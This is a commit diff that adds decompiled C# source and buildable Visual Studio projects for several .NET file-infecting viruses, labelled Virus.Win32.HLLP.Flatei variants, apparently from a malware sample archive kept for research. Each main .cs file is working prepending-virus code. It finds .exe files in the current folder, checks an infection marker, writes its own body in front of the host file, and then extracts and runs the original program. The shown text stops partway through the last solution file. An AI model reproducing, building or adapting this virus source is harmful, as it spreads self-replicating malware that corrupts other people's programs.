auto-decompiled msil via petikvx

add

MSIL/Virus/Win32/H/Virus.Win32.HLLP.Flatei.a-ee38241a988aa72787b1491e5697a7ab6b47c0957759952fb2457cf926131dd5/AssemblyInfo.cs

@@ -0,0 +1,3 @@
+using System.Reflection;
+
+[assembly: AssemblyVersion("0.0.0.0")]

MSIL/Virus/Win32/H/Virus.Win32.HLLP.Flatei.a-ee38241a988aa72787b1491e5697a7ab6b47c0957759952fb2457cf926131dd5/Virus.Win32.HLLP.Flatei.a.csproj

@@ -0,0 +1,36 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.Win32.HLLP.Flatei.a-ee38241a988aa72787b1491e5697a7ab6b47c0957759952fb2457cf926131dd5.exe-->
+  <PropertyGroup>
+    <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
+    <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
+    <ProjectGuid>{80F12460-9D56-4C26-8FA8-08797E8C4EF9}</ProjectGuid>
+    <OutputType>WinExe</OutputType>
+    <AssemblyName>syra</AssemblyName>
+    <ApplicationVersion>0.0.0.0</ApplicationVersion>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugSymbols>true</DebugSymbols>
+    <DebugType>full</DebugType>
+    <Optimize>false</Optimize>
+    <OutputPath>bin\Debug\</OutputPath>
+    <DefineConstants>DEBUG;TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugType>pdbonly</DebugType>
+    <Optimize>true</Optimize>
+    <OutputPath>bin\Release\</OutputPath>
+    <DefineConstants>TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <ItemGroup>
+    <Compile Include="msil_syra_by_alcopaul.cs" />
+    <Compile Include="AssemblyInfo.cs" />
+  </ItemGroup>
+  <Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
+</Project>

MSIL/Virus/Win32/H/Virus.Win32.HLLP.Flatei.a-ee38241a988aa72787b1491e5697a7ab6b47c0957759952fb2457cf926131dd5/Virus.Win32.HLLP.Flatei.a.sln

@@ -0,0 +1,20 @@
+
+Microsoft Visual Studio Solution File, Format Version 9.00
+# Visual Studio 2005
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "syra", "Virus.Win32.HLLP.Flatei.a-ee38241a988aa72787b1491e5697a7ab6b47c0957759952fb2457cf926131dd5.csproj", "{80F12460-9D56-4C26-8FA8-08797E8C4EF9}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Any CPU = Debug|Any CPU
+		Release|Any CPU = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{80F12460-9D56-4C26-8FA8-08797E8C4EF9}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{80F12460-9D56-4C26-8FA8-08797E8C4EF9}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{80F12460-9D56-4C26-8FA8-08797E8C4EF9}.Release|Any CPU.ActiveCfg = Release|Any CPU
+		{80F12460-9D56-4C26-8FA8-08797E8C4EF9}.Release|Any CPU.Build.0 = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal

MSIL/Virus/Win32/H/Virus.Win32.HLLP.Flatei.a-ee38241a988aa72787b1491e5697a7ab6b47c0957759952fb2457cf926131dd5/msil_syra_by_alcopaul.cs

@@ -0,0 +1,131 @@
+// Decompiled with JetBrains decompiler
+// Type: msil_syra_by_alcopaul
+// Assembly: syra, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: 04546A85-74D1-4278-A816-434AC3D415F6
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.Win32.HLLP.Flatei.a-ee38241a988aa72787b1491e5697a7ab6b47c0957759952fb2457cf926131dd5.exe
+
+using System.IO;
+using System.Reflection;
+using System.Runtime.InteropServices;
+
+internal class msil_syra_by_alcopaul
+{
+  public static void Main(string[] args)
+  {
+    Module module = Assembly.GetExecutingAssembly().GetModules()[0];
+    foreach (string file in Directory.GetFiles(Directory.GetCurrentDirectory(), "*.exe"))
+    {
+      FileStream fileStream = new FileStream(file, FileMode.OpenOrCreate, FileAccess.Read);
+      StreamReader streamReader = new StreamReader((Stream) fileStream);
+      int offset = (int) fileStream.Length - 4;
+      streamReader.BaseStream.Seek((long) offset, SeekOrigin.Begin);
+      string str1 = streamReader.ReadLine();
+      streamReader.Close();
+      string str2 = "alco";
+      if (!(str1 == str2))
+      {
+        if (!(file == module.FullyQualifiedName))
+        {
+          try
+          {
+            msil_syra_by_alcopaul.Infect(file);
+            break;
+          }
+          catch
+          {
+          }
+        }
+      }
+    }
+    FileStream input = new FileStream(module.FullyQualifiedName, FileMode.OpenOrCreate, FileAccess.Read);
+    BinaryReader binaryReader = new BinaryReader((Stream) input);
+    int length = (int) input.Length - 5124;
+    binaryReader.BaseStream.Seek(5124L, SeekOrigin.Begin);
+    byte[] buffer = new byte[(int) checked ((uint) length)];
+    int count = length;
+    int index = 0;
+    int num;
+    for (; count > 0; count -= num)
+    {
+      num = binaryReader.Read(buffer, index, count);
+      if (num != 0)
+        index += num;
+      else
+        break;
+    }
+    binaryReader.Close();
+    BinaryWriter binaryWriter = new BinaryWriter((Stream) new FileStream("hostbyte.exe", FileMode.OpenOrCreate, FileAccess.Write));
+    binaryWriter.BaseStream.Seek(0L, SeekOrigin.Begin);
+    binaryWriter.Write(buffer);
+    binaryWriter.Close();
+    msil_syra_by_alcopaul.Win32.ShellExecute(0, (string) null, "hostbyte.exe", (string) null, Directory.GetCurrentDirectory(), 1);
+    do
+    {
+      try
+      {
+        File.Delete("hostbyte.exe");
+      }
+      catch
+      {
+      }
+    }
+    while (File.Exists("hostbyte.exe"));
+    msil_syra_by_alcopaul.Win32.MessageBox(0, "::: prepending virus purely written in d flat :::", "msil.syra by alcopaul", 0U);
+  }
+
+  public static void Infect(string host)
+  {
+    BinaryReader binaryReader1 = new BinaryReader((Stream) new FileStream(Assembly.GetExecutingAssembly().GetModules()[0].FullyQualifiedName, FileMode.OpenOrCreate, FileAccess.Read));
+    binaryReader1.BaseStream.Seek(0L, SeekOrigin.Begin);
+    byte[] buffer1 = new byte[5124];
+    int count = 5124;
+    int index1 = 0;
+    int num1;
+    for (; count > 0; count -= num1)
+    {
+      num1 = binaryReader1.Read(buffer1, index1, count);
+      if (num1 != 0)
+        index1 += num1;
+      else
+        break;
+    }
+    binaryReader1.Close();
+    FileStream input = new FileStream(host, FileMode.OpenOrCreate, FileAccess.Read);
+    BinaryReader binaryReader2 = new BinaryReader((Stream) input);
+    binaryReader2.BaseStream.Seek(0L, SeekOrigin.Begin);
+    byte[] buffer2 = new byte[(int) checked ((uint) input.Length)];
+    int length = (int) input.Length;
+    int index2 = 0;
+    int num2;
+    for (; length > 0; length -= num2)
+    {
+      num2 = binaryReader2.Read(buffer2, index2, length);
+      if (num2 != 0)
+        index2 += num2;
+      else
+        break;
+    }
+    binaryReader2.Close();
+    BinaryWriter binaryWriter = new BinaryWriter((Stream) new FileStream(host, FileMode.OpenOrCreate, FileAccess.Write));
+    binaryWriter.BaseStream.Seek(0L, SeekOrigin.Begin);
+    binaryWriter.Write(buffer1);
+    binaryWriter.Write(buffer2);
+    binaryWriter.Write("alco");
+    binaryWriter.Close();
+  }
+
+  public class Win32
+  {
+    [DllImport("shell32.dll", CharSet = CharSet.Auto)]
+    public static extern int ShellExecute(
+      int hWnd,
+      string oper,
+      string file,
+      string param,
+      string dir,
+      int type);
+
+    [DllImport("user32.dll", CharSet = CharSet.Auto)]
+    public static extern int MessageBox(int hWnd, string text, string caption, uint type);
+  }
+}

MSIL/Virus/Win32/H/Virus.Win32.HLLP.Flatei.b-1b64100e80d6e3fadd04563da3f8cbe9513f039f1ab26eb0b38b1cfe9c6ff31a/AssemblyInfo.cs

@@ -0,0 +1,3 @@
+using System.Reflection;
+
+[assembly: AssemblyVersion("0.0.0.0")]

MSIL/Virus/Win32/H/Virus.Win32.HLLP.Flatei.b-1b64100e80d6e3fadd04563da3f8cbe9513f039f1ab26eb0b38b1cfe9c6ff31a/Virus.Win32.HLLP.Flatei.b.csproj

@@ -0,0 +1,36 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.Win32.HLLP.Flatei.b-1b64100e80d6e3fadd04563da3f8cbe9513f039f1ab26eb0b38b1cfe9c6ff31a.exe-->
+  <PropertyGroup>
+    <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
+    <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
+    <ProjectGuid>{E5B63C35-2400-4DB9-A7C0-FC6873B97E74}</ProjectGuid>
+    <OutputType>WinExe</OutputType>
+    <AssemblyName>v3589</AssemblyName>
+    <ApplicationVersion>0.0.0.0</ApplicationVersion>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugSymbols>true</DebugSymbols>
+    <DebugType>full</DebugType>
+    <Optimize>false</Optimize>
+    <OutputPath>bin\Debug\</OutputPath>
+    <DefineConstants>DEBUG;TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugType>pdbonly</DebugType>
+    <Optimize>true</Optimize>
+    <OutputPath>bin\Release\</OutputPath>
+    <DefineConstants>TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <ItemGroup>
+    <Compile Include="v3589_.cs" />
+    <Compile Include="AssemblyInfo.cs" />
+  </ItemGroup>
+  <Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
+</Project>

MSIL/Virus/Win32/H/Virus.Win32.HLLP.Flatei.b-1b64100e80d6e3fadd04563da3f8cbe9513f039f1ab26eb0b38b1cfe9c6ff31a/Virus.Win32.HLLP.Flatei.b.sln

@@ -0,0 +1,20 @@
+
+Microsoft Visual Studio Solution File, Format Version 9.00
+# Visual Studio 2005
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "v3589", "Virus.Win32.HLLP.Flatei.b-1b64100e80d6e3fadd04563da3f8cbe9513f039f1ab26eb0b38b1cfe9c6ff31a.csproj", "{E5B63C35-2400-4DB9-A7C0-FC6873B97E74}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Any CPU = Debug|Any CPU
+		Release|Any CPU = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{E5B63C35-2400-4DB9-A7C0-FC6873B97E74}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{E5B63C35-2400-4DB9-A7C0-FC6873B97E74}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{E5B63C35-2400-4DB9-A7C0-FC6873B97E74}.Release|Any CPU.ActiveCfg = Release|Any CPU
+		{E5B63C35-2400-4DB9-A7C0-FC6873B97E74}.Release|Any CPU.Build.0 = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal

MSIL/Virus/Win32/H/Virus.Win32.HLLP.Flatei.b-1b64100e80d6e3fadd04563da3f8cbe9513f039f1ab26eb0b38b1cfe9c6ff31a/v3589_.cs

@@ -0,0 +1,127 @@
+// Decompiled with JetBrains decompiler
+// Type: v3589_
+// Assembly: v3589, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: EC1B656C-A014-4EA6-B139-295C282840AB
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.Win32.HLLP.Flatei.b-1b64100e80d6e3fadd04563da3f8cbe9513f039f1ab26eb0b38b1cfe9c6ff31a.exe
+
+using System.IO;
+using System.Reflection;
+using System.Runtime.InteropServices;
+
+internal class v3589_
+{
+  public static void Main(string[] args)
+  {
+    Module module = Assembly.GetExecutingAssembly().GetModules()[0];
+    foreach (string file in Directory.GetFiles(Directory.GetCurrentDirectory(), "*.exe"))
+    {
+      FileStream fileStream = new FileStream(file, FileMode.OpenOrCreate, FileAccess.Read);
+      StreamReader streamReader = new StreamReader((Stream) fileStream);
+      int offset = (int) fileStream.Length - 4;
+      streamReader.BaseStream.Seek((long) offset, SeekOrigin.Begin);
+      string str1 = streamReader.ReadLine();
+      streamReader.Close();
+      string str2 = "paul";
+      if (!(str1 == str2))
+      {
+        if (!(file == module.FullyQualifiedName))
+        {
+          try
+          {
+            v3589_.infest(file);
+            break;
+          }
+          catch
+          {
+          }
+        }
+      }
+    }
+    FileStream input = new FileStream(module.FullyQualifiedName, FileMode.OpenOrCreate, FileAccess.Read);
+    BinaryReader binaryReader = new BinaryReader((Stream) input);
+    int length = (int) input.Length - 3584;
+    binaryReader.BaseStream.Seek(3584L, SeekOrigin.Begin);
+    byte[] buffer = new byte[(int) checked ((uint) length)];
+    int count = length;
+    int index = 0;
+    int num;
+    for (; count > 0; count -= num)
+    {
+      num = binaryReader.Read(buffer, index, count);
+      if (num != 0)
+        index += num;
+      else
+        break;
+    }
+    binaryReader.Close();
+    BinaryWriter binaryWriter = new BinaryWriter((Stream) new FileStream("alcopaul.exe", FileMode.OpenOrCreate, FileAccess.Write));
+    binaryWriter.BaseStream.Seek(0L, SeekOrigin.Begin);
+    binaryWriter.Write(buffer);
+    binaryWriter.Close();
+    v3589_.Win32.ShellExecute(0, (string) null, "alcopaul.exe", (string) null, Directory.GetCurrentDirectory(), 1);
+    do
+    {
+      try
+      {
+        File.Delete("alcopaul.exe");
+      }
+      catch
+      {
+      }
+    }
+    while (File.Exists("alcopaul.exe"));
+  }
+
+  public static void infest(string host)
+  {
+    BinaryReader binaryReader1 = new BinaryReader((Stream) new FileStream(Assembly.GetExecutingAssembly().GetModules()[0].FullyQualifiedName, FileMode.OpenOrCreate, FileAccess.Read));
+    binaryReader1.BaseStream.Seek(0L, SeekOrigin.Begin);
+    byte[] buffer1 = new byte[3584];
+    int count = 3584;
+    int index1 = 0;
+    int num1;
+    for (; count > 0; count -= num1)
+    {
+      num1 = binaryReader1.Read(buffer1, index1, count);
+      if (num1 != 0)
+        index1 += num1;
+      else
+        break;
+    }
+    binaryReader1.Close();
+    FileStream input = new FileStream(host, FileMode.OpenOrCreate, FileAccess.Read);
+    BinaryReader binaryReader2 = new BinaryReader((Stream) input);
+    binaryReader2.BaseStream.Seek(0L, SeekOrigin.Begin);
+    byte[] buffer2 = new byte[(int) checked ((uint) input.Length)];
+    int length = (int) input.Length;
+    int index2 = 0;
+    int num2;
+    for (; length > 0; length -= num2)
+    {
+      num2 = binaryReader2.Read(buffer2, index2, length);
+      if (num2 != 0)
+        index2 += num2;
+      else
+        break;
+    }
+    binaryReader2.Close();
+    BinaryWriter binaryWriter = new BinaryWriter((Stream) new FileStream(host, FileMode.OpenOrCreate, FileAccess.Write));
+    binaryWriter.BaseStream.Seek(0L, SeekOrigin.Begin);
+    binaryWriter.Write(buffer1);
+    binaryWriter.Write(buffer2);
+    binaryWriter.Write("paul");
+    binaryWriter.Close();
+  }
+
+  public class Win32
+  {
+    [DllImport("shell32.dll", CharSet = CharSet.Auto)]
+    public static extern int ShellExecute(
+      int hWnd,
+      string oper,
+      string file,
+      string param,
+      string dir,
+      int type);
+  }
+}

MSIL/Virus/Win32/H/Virus.Win32.HLLP.Flatei.c-b63749db4df2ea895efddc0b6cf18c433d41cd1ebcdb91a237c24d3180ecbe3e/AssemblyInfo.cs

@@ -0,0 +1,3 @@
+using System.Reflection;
+
+[assembly: AssemblyVersion("0.0.0.0")]

MSIL/Virus/Win32/H/Virus.Win32.HLLP.Flatei.c-b63749db4df2ea895efddc0b6cf18c433d41cd1ebcdb91a237c24d3180ecbe3e/Virus.Win32.HLLP.Flatei.c.csproj

@@ -0,0 +1,39 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.Win32.HLLP.Flatei.c-b63749db4df2ea895efddc0b6cf18c433d41cd1ebcdb91a237c24d3180ecbe3e.exe-->
+  <PropertyGroup>
+    <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
+    <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
+    <ProjectGuid>{E30EA5C8-8024-49FD-A82E-B6ED6E8144D0}</ProjectGuid>
+    <OutputType>WinExe</OutputType>
+    <AssemblyName>virus</AssemblyName>
+    <ApplicationVersion>0.0.0.0</ApplicationVersion>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugSymbols>true</DebugSymbols>
+    <DebugType>full</DebugType>
+    <Optimize>false</Optimize>
+    <OutputPath>bin\Debug\</OutputPath>
+    <DefineConstants>DEBUG;TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugType>pdbonly</DebugType>
+    <Optimize>true</Optimize>
+    <OutputPath>bin\Release\</OutputPath>
+    <DefineConstants>TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <ItemGroup>
+    <Reference Include="Microsoft.VisualBasic" />
+  </ItemGroup>
+  <ItemGroup>
+    <Compile Include="Virus.cs" />
+    <Compile Include="AssemblyInfo.cs" />
+  </ItemGroup>
+  <Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
+</Project>

MSIL/Virus/Win32/H/Virus.Win32.HLLP.Flatei.c-b63749db4df2ea895efddc0b6cf18c433d41cd1ebcdb91a237c24d3180ecbe3e/Virus.Win32.HLLP.Flatei.c.sln

@@ -0,0 +1,20 @@
+
+Microsoft Visual Studio Solution File, Format Version 9.00
+# Visual Studio 2005
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "virus", "Virus.Win32.HLLP.Flatei.c-b63749db4df2ea895efddc0b6cf18c433d41cd1ebcdb91a237c24d3180ecbe3e.csproj", "{E30EA5C8-8024-49FD-A82E-B6ED6E8144D0}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Any CPU = Debug|Any CPU
+		Release|Any CPU = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{E30EA5C8-8024-49FD-A82E-B6ED6E8144D0}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{E30EA5C8-8024-49FD-A82E-B6ED6E8144D0}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{E30EA5C8-8024-49FD-A82E-B6ED6E8144D0}.Release|Any CPU.ActiveCfg = Release|Any CPU
+		{E30EA5C8-8024-49FD-A82E-B6ED6E8144D0}.Release|Any CPU.Build.0 = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal

MSIL/Virus/Win32/H/Virus.Win32.HLLP.Flatei.c-b63749db4df2ea895efddc0b6cf18c433d41cd1ebcdb91a237c24d3180ecbe3e/Virus.cs

@@ -0,0 +1,166 @@
+// Decompiled with JetBrains decompiler
+// Type: Virus
+// Assembly: virus, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: 5C23CEDA-82AF-4A34-8310-1705E25611AB
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.Win32.HLLP.Flatei.c-b63749db4df2ea895efddc0b6cf18c433d41cd1ebcdb91a237c24d3180ecbe3e.exe
+
+using Microsoft.VisualBasic;
+using Microsoft.VisualBasic.Helpers;
+using System;
+using System.IO;
+using System.Reflection;
+
+[Globals.StandardModule]
+internal sealed class Virus
+{
+  [STAThread]
+  public static void Main()
+  {
+    Module module = Assembly.GetExecutingAssembly().GetModules()[0];
+    string Expression;
+    for (string str = FileSystem.Dir(FileSystem.CurDir() + "\\*.exe"); StringType.StrCmp(str, "", false) != 0; str = FileSystem.Dir())
+      Expression = Expression + str + "/";
+    foreach (object obj in (Array) Strings.Split(Expression, "/"))
+    {
+      string str1 = StringType.FromObject(obj);
+      if (StringType.StrCmp(Strings.LCase(str1), Strings.LCase(module.Name), false) != 0)
+      {
+        if (StringType.StrCmp(str1, "", false) == 0)
+        {
+          int num = (int) Interaction.MsgBox((object) "the first VB.NET virus", Title: ((object) "W32.HLLP.VeeBeeP by alcopaul"));
+          Interaction.Beep();
+          break;
+        }
+        BinaryReader binaryReader = new BinaryReader((Stream) new FileStream(str1, FileMode.Open, FileAccess.Read));
+        binaryReader.BaseStream.Seek(0L, SeekOrigin.Begin);
+        byte[] buffer = new byte[85];
+        int count = 84;
+        int index = 0;
+        while (count > 0)
+        {
+          int num = binaryReader.Read(buffer, index, count);
+          if (num != 0)
+          {
+            checked { index += num; }
+            checked { count -= num; }
+          }
+          else
+            break;
+        }
+        binaryReader.Close();
+        FileSystem.FileOpen(1, "sig.txt", OpenMode.Binary);
+        FileSystem.FilePut(1, (Array) buffer, -1, false, false);
+        FileSystem.FileClose(1);
+        FileSystem.FileOpen(1, "sig.txt", OpenMode.Input);
+        string str2 = FileSystem.LineInput(1);
+        FileSystem.FileClose(1);
+        FileSystem.Kill("sig.txt");
+        if (StringType.StrCmp(Strings.LCase(Strings.Mid(Strings.Right(str2, 7), 1, checked (Strings.Len(Strings.Right(str2, 7)) - 1))), "alcovb", false) != 0)
+        {
+          try
+          {
+            Virus.infect(str1);
+            break;
+          }
+          catch (Exception ex)
+          {
+            ProjectData.SetProjectError(ex);
+            ProjectData.ClearProjectError();
+          }
+        }
+      }
+    }
+    try
+    {
+      object input = (object) new FileStream(module.FullyQualifiedName, FileMode.Open, FileAccess.Read);
+      BinaryReader binaryReader = new BinaryReader((Stream) input);
+      int num1 = IntegerType.FromObject(ObjectType.SubObj(LateBinding.LateGetNoByRef(input, (Type) null, "Length", new object[0], (string[]) null), (object) 6145));
+      binaryReader.BaseStream.Seek(6145L, SeekOrigin.Begin);
+      byte[] buffer = new byte[checked (num1 + 1)];
+      int count = num1;
+      int index = 0;
+      while (count > 0)
+      {
+        int num2 = binaryReader.Read(buffer, index, count);
+        if (num2 != 0)
+        {
+          checked { index += num2; }
+          checked { count -= num2; }
+        }
+        else
+          break;
+      }
+      binaryReader.Close();
+      FileSystem.FileOpen(1, "vbnet.exe", OpenMode.Binary);
+      FileSystem.FilePut(1, (Array) buffer, -1, false, false);
+      FileSystem.FileClose(1);
+      Interaction.Shell("vbnet.exe " + Interaction.Command(), AppWinStyle.NormalFocus);
+    }
+    catch (Exception ex)
+    {
+      ProjectData.SetProjectError(ex);
+      int num = (int) Interaction.MsgBox((object) "first generation");
+      ProjectData.ClearProjectError();
+    }
+    do
+    {
+      try
+      {
+        File.Delete("vbnet.exe");
+      }
+      catch (Exception ex)
+      {
+        ProjectData.SetProjectError(ex);
+        ProjectData.ClearProjectError();
+      }
+    }
+    while (File.Exists("vbnet.exe"));
+  }
+
+  public static object infect(string fff)
+  {
+    BinaryReader binaryReader1 = new BinaryReader((Stream) new FileStream(Assembly.GetExecutingAssembly().GetModules()[0].FullyQualifiedName, FileMode.Open, FileAccess.Read));
+    binaryReader1.BaseStream.Seek(0L, SeekOrigin.Begin);
+    byte[] buffer1 = new byte[6145];
+    int count1 = 6144;
+    int index1 = 0;
+    while (count1 > 0)
+    {
+      int num = binaryReader1.Read(buffer1, index1, count1);
+      if (num != 0)
+      {
+        checked { index1 += num; }
+        checked { count1 -= num; }
+      }
+      else
+        break;
+    }
+    binaryReader1.Close();
+    object input = (object) new FileStream(fff, FileMode.Open, FileAccess.Read);
+    BinaryReader binaryReader2 = new BinaryReader((Stream) input);
+    long num1 = LongType.FromObject(LateBinding.LateGetNoByRef(input, (Type) null, "Length", new object[0], (string[]) null));
+    binaryReader2.BaseStream.Seek(0L, SeekOrigin.Begin);
+    byte[] buffer2 = new byte[checked ((int) num1 + 1)];
+    int count2 = IntegerType.FromObject(LateBinding.LateGetNoByRef(input, (Type) null, "Length", new object[0], (string[]) null));
+    int index2 = 0;
+    while (count2 > 0)
+    {
+      int num2 = binaryReader2.Read(buffer2, index2, count2);
+      if (num2 != 0)
+      {
+        checked { index2 += num2; }
+        checked { count2 -= num2; }
+      }
+      else
+        break;
+    }
+    binaryReader2.Close();
+    FileSystem.FileOpen(1, fff, OpenMode.Binary);
+    FileSystem.FilePut(1, (Array) buffer1, -1, false, false);
+    FileSystem.FilePut(1, (Array) buffer2, -1, false, false);
+    FileSystem.FilePut(1, "alcovb", -1, false);
+    FileSystem.FileClose(1);
+    object obj;
+    return obj;
+  }
+}

MSIL/Virus/Win32/H/Virus.Win32.HLLP.Flatei.d-530621cdc88ae9ee0fcdea85f02fdf94885c1884f085b4dc62ccea10a89aa4d9/AssemblyInfo.cs

@@ -0,0 +1,3 @@
+using System.Reflection;
+
+[assembly: AssemblyVersion("0.0.0.0")]

MSIL/Virus/Win32/H/Virus.Win32.HLLP.Flatei.d-530621cdc88ae9ee0fcdea85f02fdf94885c1884f085b4dc62ccea10a89aa4d9/Virus.Win32.HLLP.Flatei.d.csproj

@@ -0,0 +1,36 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.Win32.HLLP.Flatei.d-530621cdc88ae9ee0fcdea85f02fdf94885c1884f085b4dc62ccea10a89aa4d9.exe-->
+  <PropertyGroup>
+    <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
+    <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
+    <ProjectGuid>{DF1CC23E-B74A-475A-B8FD-BA74EEC453D8}</ProjectGuid>
+    <OutputType>WinExe</OutputType>
+    <AssemblyName>syra.b</AssemblyName>
+    <ApplicationVersion>0.0.0.0</ApplicationVersion>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugSymbols>true</DebugSymbols>
+    <DebugType>full</DebugType>
+    <Optimize>false</Optimize>
+    <OutputPath>bin\Debug\</OutputPath>
+    <DefineConstants>DEBUG;TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugType>pdbonly</DebugType>
+    <Optimize>true</Optimize>
+    <OutputPath>bin\Release\</OutputPath>
+    <DefineConstants>TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <ItemGroup>
+    <Compile Include="msil_syra_by_alcopaul.cs" />
+    <Compile Include="AssemblyInfo.cs" />
+  </ItemGroup>
+  <Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
+</Project>

MSIL/Virus/Win32/H/Virus.Win32.HLLP.Flatei.d-530621cdc88ae9ee0fcdea85f02fdf94885c1884f085b4dc62ccea10a89aa4d9/Virus.Win32.HLLP.Flatei.d.sln

@@ -0,0 +1,20 @@
+
+Microsoft Visual Studio Solution File, Format Version 9.00
+# Visual Studio 2005
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "syra.b", "Virus.Win32.HLLP.Flatei.d-530621cdc88ae9ee0fcdea85f02fdf94885c1884f085b4dc62ccea10a89aa4d9.csproj", "{DF1CC23E-B74A-475A-B8FD-BA74EEC453D8}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Any CPU = Debug|Any CPU
+		Release|Any CPU = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{DF1CC23E-B74A-475A-B8FD-BA74EEC453D8}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{DF1CC23E-B74A-475A-B8FD-BA74EEC453D8}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{DF1CC23E-B74A-475A-B8FD-BA74EEC453D8}.Release|Any CPU.ActiveCfg = Release|Any CPU
